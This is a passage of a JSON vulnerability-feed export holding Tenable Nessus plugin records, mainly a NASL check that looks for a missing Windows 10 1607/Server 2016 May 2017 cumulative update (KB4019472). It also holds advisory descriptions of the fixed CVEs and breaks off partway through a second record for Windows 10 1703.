the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows 